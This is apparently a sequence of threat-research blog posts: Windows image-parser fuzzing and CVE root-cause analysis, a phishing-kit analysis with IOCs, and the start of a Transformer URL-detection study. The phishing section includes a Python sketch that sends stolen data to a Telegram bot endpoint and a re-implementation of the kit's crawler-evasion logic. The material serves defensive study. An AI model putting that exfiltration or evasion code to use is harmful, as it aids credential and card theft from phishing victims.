            for(int i = 0; i < ROUNDS; i++)
            {
                  unsigned char *currPixels = DecodeImage(imagePath);
                  if(!ComparePixels(refPixels, currPixels))
                  {
                        // the reference pixels and current pixels don't match
                        // crash now to let the fuzzer know of this file
                        CrashProgram();
                  }
                  free(currPixels);
            }
            free(refPixels);
      }
}

Figure 2: Diff harness

The idea behind this fuzzing harness is not entirely new; previously, lcamtuf used a similar idea to detect uninitialized memory in open-source image parsers and used a web page to display the pixel differences.

Fuzzing

With the diffing harness ready, one can proceed to identify the supported image formats and gather corpuses. Gathering image files is considerably easy given their near unlimited availability on the internet, but it is much harder to select, from millions of files, a corpus that exercises unique code coverage. Code coverage information for Windows image parsing is tracked from WindowsCodecs.dll.

Note that unlike regular Windows fuzzing, we will not be enabling PageHeap this time as PageHeap “initializes” the heap allocations with patterns.

Results

During my research, I found three cases of uninitialized memory usage while fuzzing Windows built-in image parsers. Two of them are explained in detail in the next sections. Root cause analysis of uninitialized memory usage is non-trivial: we don’t have a crash location to trace back from, and instead have to work backward from the resulting pixel buffer to find the root cause—or use clever tricks to find the deviation.

CVE-2020-0853

Let’s look at the rendering of the proof of concept (PoC) file before going into the root cause of this vulnerability. For this we will use lcamtuf’s HTML, which loads the PoC image multiple times and compares the pixels with reference pixels.


Figure 3: CVE-2020-0853

As we can see from the resulting images (Figure 3), the output varies drastically in each decoding and we can assume this PoC leaks a lot of uninitialized memory.

To identify the root cause of these vulnerabilities, I used Time Travel Debugging (TTD) extensively. Tracing back the execution and keeping track of memory addresses is a tedious task, but TTD makes it only slightly less painful by keeping the addresses and values constant and providing unlimited forward and backward executions.

After spending quite a bit of time debugging the trace, I found the source of uninitialized memory in windowscodecs!CFormatConverter::Initialize. Even though the source was found, it was not initially clear why this memory ends up in the calculation of pixels without getting overwritten at all. To solve this mystery, additional debugging was done by comparing PoC execution trace against a normal TIFF file decoding. The following section shows the allocation, copying of uninitialized value to pixel calculation and the actual root cause of the vulnerability.

Allocation and Use of Uninitialized Memory

windowscodecs!CFormatConverter::Initialize allocates 0x40 bytes of memory, as shown in Figure 4.

0:000> r
rax=0000000000000000 rbx=0000000000000040 rcx=0000000000000040
rdx=0000000000000008 rsi=000002257a3db448 rdi=0000000000000000
rip=00007ffaf047a238 rsp=000000ad23f6f7c0 rbp=000000ad23f6f841
 r8=000000ad23f6f890  r9=0000000000000010 r10=000002257a3db468
r11=000000ad23f6f940 r12=000000000000000e r13=000002257a3db040
r14=000002257a3dbf60 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
windowscodecs!CFormatConverter::Initialize+0x1c8:
00007ffa`f047a238 ff15ea081200    call    qword ptr [windowscodecs!_imp_malloc (00007ffa`f059ab28)] ds:00007ffa`f059ab28={msvcrt!malloc (00007ffa`f70e9d30)}
0:000> k
 # Child-SP          RetAddr               Call Site
00 000000ad`23f6f7c0 00007ffa`f047c5fb     windowscodecs!CFormatConverter::Initialize+0x1c8
01 000000ad`23f6f890 00007ffa`f047c2f3     windowscodecs!CFormatConverter::Initialize+0x12b
02 000000ad`23f6f980 00007ff6`34ca6dff     windowscodecs!CFormatConverterResolver::Initialize+0x273

//Uninitialized memory after allocation:
0:000> db @rax
00000225`7a3dbf70  d0 b0 3d 7a 25 02 00 00-60 24 3d 7a 25 02 00 00  ..=z%...`$=z%...
00000225`7a3dbf80  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbf90  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfa0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfb0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfc0  00 00 00 00 00 00 00 00-64 51 7c 26 c3 2c 01 03  ........dQ|&.,..
00000225`7a3dbfd0  f0 00 2f 6b 25 02 00 00-f0 00 2f 6b 25 02 00 00  ../k%...../k%...
00000225`7a3dbfe0  60 00 3d 7a 25 02 00 00-60 00 3d 7a 25 02 00 00  `.=z%...`.=z%...

Figure 4: Allocation of memory

The memory never gets written, and the uninitialized values are inverted in windowscodecs!CLibTiffDecoderBase::HrProcessCopy and further processed in windowscodecs!GammaConvert_16bppGrayInt_128bppRGBA and in the scaling functions called later.

As there is no read or write into uninitialized memory before HrProcessCopy, I traced the execution back from HrProcessCopy and compared the execution traces with a normal tiff decoding trace. A difference was found in the way windowscodecs!CLibTiffDecoderBase::UnpackLine behaved with the PoC file compared to a normal TIFF file, and one of the function parameters in UnpackLine was a pointer to the uninitialized buffer.

The UnpackLine function has a series of switch-case statements working with bits per sample (BPS) of TIFF images. In our PoC TIFF file, the BPS value is 0x09—which is not supported by UnpackLine—and the control flow never reaches a code path that writes to the buffer. This is the root cause of the uninitialized memory, which gets processed further down the pipeline and finally shown as pixel data.

Patch

After presenting my analysis to Microsoft, they decided to patch the vulnerability by treating files with unsupported BPS values as invalid. This avoids all decoding and rejects the file in the very early phase of its loading.

CVE-2020-1397


Figure 5: Rendering of CVE-2020-1397

Unlike the previous vulnerability, the difference in the output is quite limited in this one, as seen in Figure 5. One of the simpler root cause analysis techniques for this type of uninitialized memory usage is comparing execution traces of runs that produce two different outputs. The technique is helpful when an uninitialized value causes a control flow change in the program, which in turn causes the difference in outputs. For this, a binary instrumentation script was written that logged every executed instruction along with its registers and accessed memory values.

Diffing two distinct execution traces by comparing the instruction pointer (RIP) value, I found a control flow change in windowscodecs!CCCITT::Expand2DLine due to a usage of an uninitialized value. Back tracing the uninitialized value using TTD trace was exceptionally useful for finding the root cause. The following section shows the allocation, population and use of the uninitialized value, which leads to the control flow change and deviance in the pixel outputs.

Allocation

windowscodecs!TIFFReadBufferSetup allocates 0x400 bytes of memory, as shown in Figure 6.

windowscodecs!TIFFReadBufferSetup:
    ...
    allocBuff = malloc(size);
    *(v3 + 16) |= 0x200u;
    *(v3 + 480) = allocBuff;

0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f128 00007ff9`4404d4f3 windowscodecs!TIFFReadBufferSetup
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0xab
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

 

After allocation:
0:000> !heap -p -a @rax
    address 0000029744382140 found in
    _HEAP @ 29735190000
              HEAP_ENTRY Size Prev Flags            UserPtr UserSize - state
        0000029744382130 0041 0000  [00]   0000029744382140    00400 - (busy)
          unknown!noop

//Uninitialized memory after allocation        
0:000> db @rax
00000297`44382140  40 7c 5e 97 29 5d 5f ae-73 31 98 70 b8 4f da ac  @|^.)]_.s1.p.O..
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;..D..nK.@18.
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}..@..EOy...T.D
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.

Figure 6: Allocation of memory

Partially Populating the Buffer

0x10 bytes are copied from the input file to this allocated buffer by TIFFReadRawStrip1. The rest of the buffer remains uninitialized with random values, as shown in Figure 7.

if ( !TIFFReadBufferSetup(v2, a2, stripCount) ) {
      return 0i64;
}
if ( TIFFReadRawStrip1(v2, v3, sizeToReadFromFile, "TIFFFillStrip") != sizeToReadFromFile )

 

0:000> r
rax=0000000000000001 rbx=000002973519a7e0 rcx=000002973519a7e0
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000010
rip=00007ff94404d58c rsp=000000aaa654f128 rbp=0000000000000000
 r8=0000000000000010  r9=00007ff94416fc38 r10=0000000000000000
r11=000000aaa654ef60 r12=0000000000000001 r13=0000000000000000
r14=0000029744377de0 r15=0000000000000001
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
windowscodecs!TIFFReadRawStrip1:
00007ff9`4404d58c 488bc4          mov     rax,rsp
0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f128 00007ff9`4404d491 windowscodecs!TIFFReadRawStrip1
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0x49
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

0:000> db 00000297`44382140
00000297`44382140  5b cd 82 55 2a 94 e2 6f-d7 2d a5 93 58 23 00 6c  [..U*..o.-..X#.l             // 0x10 bytes from file
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.             // uninitialized memory
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;..D..nK.@18.
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}..@..EOy...T.D
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.

Figure 7: Partial population of memory

Use of Uninitialized Memory

0:000> r
rax=0000000000000006 rbx=0000000000000007 rcx=0000000000000200
rdx=0000000000011803 rsi=0000029744382150 rdi=0000000000000000
rip=00007ff94414e837 rsp=000000aaa654f050 rbp=0000000000000001
 r8=0000029744382550  r9=0000000000000000 r10=0000000000000008
r11=0000000000000013 r12=00007ff94418b7b0 r13=0000000000000003
r14=0000000023006c00 r15=00007ff94418bbb0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
windowscodecs!CCCITT::Expand2DLine+0x253:
00007ff9`4414e837 0fb606          movzx   eax,byte ptr [rsi] ds:00000297`44382150=06             ; Uninitialized memory being accessed

 

0:000> db 00000297`44382140
00000297`44382140  5b cd 82 55 2a 94 e2 6f-d7 2d a5 93 58 23 00 6c  [..U*..o.-..X#.l             // 0x10 bytes from file
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.             // uninitialized memory
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;..D..nK.@18.
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}..@..EOy...T.D
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.

 

0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f050 00007ff9`4414df80 windowscodecs!CCCITT::Expand2DLine+0x253
01 000000aa`a654f0d0 00007ff9`4412afcc windowscodecs!CCCITT::CCITT_Expand+0xac
02 000000aa`a654f120 00007ff9`4404d3f0 windowscodecs!CCITTDecode+0x7c
03 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0xb8
04 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
05 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
06 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
07 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
08 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
09 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
0a 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

Figure 8: Reading of uninitialized value

Depending on the uninitialized value (Figure 8), different code paths are taken in Expand2DLine, which will change the output pixels, as shown in Figure 9.

  {
    {
        if ( v11 != 1 || a2 )
        {
            unintValue = *++allocBuffer | (unintValue << 8);          // uninit mem read
        }
        else
        {
            unintValue <<= 8;
            ++allocBuffer;
        }
        --v11;
        v16 += 8;
      }
      v29 = unintValue >> (v16 - 8);
      dependentUninitValue = *(l + 2i64 * v29);                           
      v16 -= *(l + 2i64 * v29 + 1);
      if ( dependentUninitValue >= 0 )             // path 1
        break;
      if ( dependentUninitValue < '\xC0' )
        return 0xFFFFFFFFi64;                     // path 2
  }
  if ( dependentUninitValue <= 0x3F )              // path xx
      break;

Figure 9: Use of uninitialized memory in if conditions

Patch

Microsoft decided to patch this vulnerability by using calloc instead of malloc, which initializes the allocated memory with zeros.

Conclusion

Part Two of this blog series presents multiple vulnerabilities in Windows’ built-in image parsers. In the next post, we will explore newer supported image formats in Windows such as RAW, HEIF and more.

Phishing Campaign Leverages WOFF Obfuscation and Telegram Channels for Communication

26 January 2021 at 20:45

FireEye Email Security recently encountered various phishing campaigns, mostly in the Americas and Europe, using source code obfuscation with compromised or bad domains. These domains were masquerading as authentic websites and stole personal information such as credit card data. The stolen information was then exfiltrated to cross-platform, cloud-based instant messaging applications.

Coming off a busy holiday season with a massive surge in deliveries, this post highlights a phishing campaign involving a fake DHL tracking page. While phishing attacks targeting users of shipping services are not new, the techniques used in these examples are more complex than what would be found in an off-the-shelf phishing kit.

This campaign uses a WOFF-based substitution cipher, localization-specific targeting, and various evasion techniques, which we unravel in this post.

Attack Flow

The attack starts with an email imitating DHL, as seen in Figure 1. The email tries to trick the recipient into clicking on a link, which would take them to a fake DHL website. In Figure 2, we can see the fake page asking for credit card details that, if submitted, would give the user a generic response while, in the background, the credit card data is sent to the attackers.


Figure 1: DHL phishing attempt


Figure 2: Fake website imitating DHL tracking

This DHL phishing campaign uses a rare technique for obfuscating its source page. The page source contains proper strings, valid tags, and appropriate formatting, but it also contains encoded text that would render as gibberish were it not decoded as the page loads, as seen in Figure 3. Typically, such text is decoded by script functions included within the page. In this case, however, the decoding functions are not contained in the script.


Figure 3: Snippet of the encoded text on page source

The decoding is done by a Web Open Font Format (WOFF) font file; it happens when the page loads in a browser and is not visible in the page content itself. Figure 4 shows the substitution cipher method and the WOFF font file. The attacker does this to evade detection by security vendors: many vendors rely on static or regex-based signature rules, and this method breaks those naïve conditions.


Figure 4: WOFF substitution cipher
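
Conceptually, the scheme is an ordinary substitution cipher applied to the page text, with the WOFF font's remapped glyphs undoing it only at render time. A hypothetical Python illustration follows (the real per-kit mapping lives in the font file itself):

import string

plain = string.ascii_lowercase
cipher = "qwertyuiopasdfghjklzxcvbnm"  # hypothetical per-kit substitution key

encode = str.maketrans(plain, cipher)  # applied to the text in the page source
decode = str.maketrans(cipher, plain)  # the effect of the WOFF glyph remapping

source_text = "track your parcel".translate(encode)
print(source_text)                    # gibberish: all a static scanner sees
print(source_text.translate(decode))  # the readable text the victim sees rendered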

The custom font that decodes the text is loaded via Cascading Style Sheets (CSS). This technique is rare, as JavaScript functions are traditionally used to encrypt and decrypt HTML text.


Figure 5: CSS file for loading WOFF font file

Figure 5 shows the CSS file used to load the WOFF font file. We have also seen the same CSS file, style.css, being hosted on the following domains:

  • hxxps://www.lifepointecc[.]com/wp-content/sinin/style.css
  • hxxps://candyman-shop[.]com/auth/DHL_HOME/style.css
  • hxxps://mail.rsi-insure[.]com/vendor/ship/dhexpress/style.css
  • hxxps://www.scriptarticle[.]com/thro/HOME/style.css

These legitimate-looking domains are not hosting any phishing websites at the time of writing; instead, they appear to serve as a repository for attackers to use in their phishing campaigns. We have seen similar phishing attacks targeting the banking sector in the past, but this is newer for delivery websites.

Notable Techniques

Localization

The phishing page displays the local language based on the region of the targeted user. The localization code (Figure 6) supports major languages spoken in Europe and the Americas such as Spanish, English, and Portuguese.


Figure 6: Localization code

The backend contains PHP resource files for each supported language (Figure 7), which are picked up dynamically based on the user’s IP address location.


Figure 7: Language resource files
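
Conceptually, the server-side selection reduces to a simple lookup, as in the Python sketch below; the actual kit is written in PHP, and the resource file names beyond those visible in Figure 7 are assumptions.

# Minimal sketch of geo-based resource selection (the country code is assumed
# to come from an IP geolocation lookup; file names are hypothetical).
LANG_RESOURCES = {'ES': 'es.php', 'PT': 'pt.php', 'BR': 'pt.php', 'US': 'en.php'}

def pick_language_resource(country_code):
    # Fall back to English for unsupported regions
    return LANG_RESOURCES.get(country_code, 'en.php')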

Evasion

This campaign employs a variety of techniques to evade detection, and it will not serve a phishing page if the request comes from certain blocked IP addresses. The backend code (Figure 8) serves users a "HTTP/1.1 403 Forbidden" response header under the following conditions (a Python re-implementation follows Figure 8):

  • IP has been seen five times (AntiBomb_User func)
  • IP host resolves to a name on its list of avoided host names ('google', 'Altavista', 'Israel', 'M247', 'barracuda', 'niw.com.au' and more) (AntiBomb_WordBoot func)
  • IP is on its own local blocklist CSV (x.csv in the kit) (AntiBomb_Boot func)
  • IP has been seen POSTing three times (AntiBomb_Block func)


Figure 8: Backend evasion code
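
Re-implemented in Python for clarity, the gating logic amounts to the sketch below. The AntiBomb_* names mirror the kit's PHP functions; the helper parameters are assumptions.

# Sketch of the kit's 403 gate (Python re-implementation for illustration).
BLOCKED_HOST_WORDS = ['google', 'altavista', 'israel', 'm247',
                      'barracuda', 'niw.com.au']

def should_block(ip, hostname, seen_counts, post_counts, local_blocklist):
    if seen_counts.get(ip, 0) >= 5:                              # AntiBomb_User
        return True
    if any(w in hostname.lower() for w in BLOCKED_HOST_WORDS):   # AntiBomb_WordBoot
        return True
    if ip in local_blocklist:                                    # AntiBomb_Boot (x.csv)
        return True
    if post_counts.get(ip, 0) >= 3:                              # AntiBomb_Block
        return True
    return False  # otherwise serve the phishing page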

After looking at the list of blocked hosts, we could deduce that the attackers were trying to block web crawlers.

Data Theft

The attackers behind this phishing campaign attempted to steal credentials, credit card data, and other sensitive information. The stolen data is sent to email addresses and Telegram channels controlled by the attacker. We uncovered a Telegram channel where data is being sent using the Telegram Bot API shown in Figure 9.


Figure 9: Chat log

While using the PHP mail() function to send stolen credentials remains quite common, attackers have recently turned to encrypted instant messaging applications such as Telegram to send phished information back to command and control servers.
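
For reference, exfiltration over the Telegram Bot API requires nothing more than an HTTP request to a bot's sendMessage endpoint, as in this sketch; the token and chat ID are placeholders, not values from this campaign.

import requests

TOKEN = '<bot-token>'      # placeholder
CHAT_ID = '<channel-id>'   # placeholder

def exfiltrate(stolen_text):
    # Telegram Bot API sendMessage: https://core.telegram.org/bots/api#sendmessage
    url = 'https://api.telegram.org/bot{}/sendMessage'.format(TOKEN)
    requests.post(url, data={'chat_id': CHAT_ID, 'text': stolen_text})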

We were able to access one of the Telegram channels controlled by the attacker as shown in Figure 10. The sensitive information being sent in the chat includes IP addresses and credit card data.


Figure 10: Telegram channel with stolen information

Conclusion

Attackers (and especially phishers) are always on the hunt for new ways to evade detection by security products. Obfuscation gives the attackers an edge, and makes it harder for security vendors to protect their customers.

By using instant messaging applications, attackers receive user data in real time, and victims have little time to respond once their personal information is compromised.

Indicators of Compromise (IOC)

FireEye Email Security utilizing FAUDE (FireEye Advanced URL Detection Engine) protects customers from these types of phishing threats. Unlike traditional anti-phishing techniques dependent on static inspection of phishing URL content, FAUDE uses multiple artificial intelligence (AI) and machine learning (ML) engines to more effectively thwart these attacks.

From December 2020 until the time of posting, our FAUDE detection engine saw more than 100 unique URLs hosting DHL phishing pages with obfuscated source code, including:

  • hxxps://bit[.]ly/2KJ03RH
  • hxxps://greencannabisstore[.]com/0258/redirect-new.php
  • hxxps://directcallsolutions[.]co[.]za/CONTACT/DHL_HOME/
  • hxxps://danapluss[.]com/wp-admin/dhl/home/
  • hxxp://r.cloudcyberlink[.]digital/<path> (multiple paths using same domain)
Email Addresses
Telegram Users
  • @Saitama330
  • @cameleon9
style.css
  • MD5: 83b9653d14c8f7fb95d6ed6a4a3f18eb
  • SHA-256: d79ec35dc8277aff48adaf9df3ddd5b3e18ac7013e8c374510624ae37cdfba31
font-woff2
  • MD5: b051d61b693c76f7a6a5f639177fb820
  • SHA-256: 5dd216ad75ced5dd6acfb48d1ae11ba66fb373c26da7fc5efbdad9fd1c14f6e3
Domains

  • pradosdemojanda[.]com
  • global-general-trackks.supercarhiredubai[.]com
  • tracking-dhi[.]company
  • tapolarivercamp[.]com
  • rosariumvigil[.]com
  • mydhlexpert[.]com
  • autorepairbyfradel[.]com

URLs

  • hxxps://wantirnaosteo[.]com[.]au/logon/home/MARKET/F004f19441/11644210b.php
  • hxxps://ekartenerji[.]com[.]tr/wp-admin/images/dk/DHL/home.php
  • hxxps://aksharapratishthan[.]org/admin/imagess/F004f19441/sms1.php
  • hxxps://royalgateedu[.]com/wp-content/plugins/elementor/includes/libraries/infos/package/F004f19441/00951124a.php
  • hxxps://vandahering[.]com[.]br/htacess
  • hxxps://hkagc[.]com/man/age/F004f19441/11644210b.php
  • hxxps://fiquefitnes[s]comsaude[.]com/.well-known/MARKET/MARKET/F004f19441/11644210b.php
  • hxxps://juneispearlmonth[.]com/-/15454874518741212/dhl-tracking/F004f19441/00951124a.php
  • hxxps://www.instantcopywritingscript[.]com/blog/wp-content/22/DHL/MARKET
  • hxxps://isss[.]sjs[.]org[.]hk/wp-admin/includes/F004f19441/11644210b.php
  • hxxps://www.concordceramic[.]com/fr/frais/F004f19441/11644210b.php
  • hxxps://infomediaoutlet[.]com/oldsite/wp-content/uploads/2017/02/MARKET/
  • hxxps://wema-wicie[.]pl/dh/l/en/MARKET
  • hxxps://www.grupoindustrialsp[.]com/DHL/MARKET/
  • hxxps://marrecodegoias[.]com[.]br/wp-snapshots/activat/MARKET/F004f19441/11644210b.php
  • hxxps://villaluna[.]de/wp-content/info/MARKET/F004f19441/11644210b.php
  • hxxp://sandur[.]dk/wp-content/upgrade/-/MARKET/
  • hxxps://chistimvse[.]com/es/dhl/MARKET/
  • hxxps://detmayviet[.]com/wp-includes/widgets/-/MARKET/F004f19441/11644210b.php
  • hxxps://dartebreakfast[.]com/wp-content/plugins/dhl-espress/MARKET/
  • hxxps://genesisdistributors[.]com/-/Tracking/dhl/Tracking/dhl-tracking/F004f19441/00951124a.php
  • hxxps://www.goldstartechs[.]com/wp-admin/js/widgets/102/F004f19441/11644210b.php
  • hxxps://universalpublicschooltalwandisabo[.]com/DHL
  • hxxps://intranet[.]prorim[.]org[.]br/info/MARKET/F004f19441/11644210b.php
  • hxxps://administrativos[.]cl/mail.php
  • hxxps://nataliadurandpsicologa[.]com[.]br/upgrade/MARKET/F004f19441/11644210b.php
  • hxxps://tanaxinvest[.]com/en/dhl/MARKET/
  • hxxps://deepbluedivecenter[.]com/clear/item/
  • hxxps://keystolivingafulfilledlife[.]com/wp-admin/includes/daspoe99i3mdef/DOCUNTRITING


Training Transformers for Cyber Security Tasks: A Case Study on Malicious URL Prediction

21 January 2021 at 17:30

Highlights       

  • Perform a case study on using Transformer models to solve cyber security problems
  • Train a Transformer model to detect malicious URLs under multiple training regimes
  • Compare our model against other deep learning methods, and show it performs on-par with other top-scoring models
  • Identify issues with applying generative pre-training to malicious URL detection, which is a cornerstone of Transformer training in natural language processing (NLP) tasks
  • Introduce novel loss function that balances classification and generative loss to achieve improved performance on the malicious URL detection task

Introduction

Over the past three years, Transformer machine learning (ML) models, or “Transformers” for short, have yielded impressive breakthroughs in a variety of sequence modeling problems, specifically natural language processing (NLP). For example, OpenAI’s latest GPT-3 model is capable of generating long segments of grammatically correct prose from scratch. Spinoff models, such as those developed for question answering, are capable of correlating context over multiple sentences. AI Dungeon, a single and multiplayer text adventure game, uses Transformers to generate plausible, unlimited content in a variety of fantasy settings. Transformers’ NLP modeling capabilities are so powerful that they pose security risks in their own right, given their potential to spread disinformation; on the other side of the coin, they can be used as powerful tools to detect and mitigate disinformation campaigns. For example, in previous research by the FireEye Data Science team, an NLP Transformer was fine-tuned to detect disinformation on social media sites.

Given the power of these Transformer models, it seems natural to wonder whether we can apply them to other types of cyber security problems that do not necessarily involve natural language, per se. In this blog post, we discuss a case study in which we apply Transformers to malicious URL detection. Studying Transformer performance on the URL detection problem is a logical first step toward extending Transformers to more generic cyber security tasks, since URLs are not technically natural language sequences yet share some common characteristics with them.

In the following sections, we outline a typical Transformer architecture and discuss how we adapt it to URLs with a character-focused tokenization. We then discuss loss functions we employ to guide the training of the model, and finally compare our training approaches to more conventional ML-based modeling options.

Adapting Transformers to URLs

Our URL Transformer operates at the character level, where each character in the URL corresponds to an input token. When a URL is input to our Transformer, it is appended with special tokens—a classification token (“CLS”) that conditions the model to produce a prediction and padding tokens (“PAD”) that normalize the input to a fixed length to allow for parallel training. Each token in the input string is then projected into a character embedding space, followed by a stack of Attention and Feed-Forward Neural Network (FFNN) layers. This stack of layers is similar to the architecture introduced in the original Transformers paper. At a high level, the Attention layers allow each input to be associated with long-distance context of other characters that are important for the classification task, similar to the notion of attention in humans, while the FFNN layers provide capacity for learning the relationships among the combination of inputs and their respective contexts. An illustration of our architecture is shown in Figure 1.

Additionally, the URL Transformer employs a masking strategy in its Attention calculation, which enforces a left-to-right (L-R) dependence. This means that only input characters from the left of a given character influence that character’s representation in each layer of the attention stack. The network outputs one embedding for each input character, which captures all information learned by the model about the character sequence up to that point in the input.

Once the model is trained, we can use the URL Transformer to perform several different tasks, such as generatively predicting the next character in the input sequence by feeding the sequence embedding into another neural network with a softmax output over the possible vocabulary of characters. A specific example of this is shown in Figure 1, where we take the embedding of the input “firee” and use it to predict the next most likely character, “y.” Similarly, we can use the embedding produced after the classification token to predict other properties of the input sequence, such as its likelihood of maliciousness.


Figure 1: High-level overview of the URL Transformer architecture
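
As a rough illustration of this architecture, the following PyTorch sketch builds a character-level encoder with a left-to-right attention mask and the two output heads described above. The hyperparameters, layer counts, and vocabulary layout are placeholders, not the values used in our experiments.

import torch
import torch.nn as nn

PAD, CLS = 0, 1  # special token ids (assumed vocabulary layout)

class URLTransformer(nn.Module):
    def __init__(self, vocab_size=128, d_model=128, n_heads=4,
                 n_layers=4, max_len=256):
        super().__init__()
        self.tok = nn.Embedding(vocab_size, d_model, padding_idx=PAD)
        self.pos = nn.Embedding(max_len, d_model)
        layer = nn.TransformerEncoderLayer(
            d_model, n_heads, dim_feedforward=4 * d_model, batch_first=True)
        self.encoder = nn.TransformerEncoder(layer, n_layers)
        self.next_char = nn.Linear(d_model, vocab_size)  # generative head
        self.classify = nn.Linear(d_model, 1)            # malicious/benign head

    def forward(self, ids):
        # ids: (batch, seq) character tokens with the CLS token appended last
        t = ids.size(1)
        x = self.tok(ids) + self.pos(torch.arange(t, device=ids.device))
        # Boolean causal mask: True above the diagonal blocks right-context,
        # enforcing the left-to-right dependence described above
        causal = torch.triu(torch.ones(t, t, dtype=torch.bool,
                                       device=ids.device), diagonal=1)
        h = self.encoder(x, mask=causal)
        return self.next_char(h), self.classify(h[:, -1])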

Loss Functions and Training Regimes

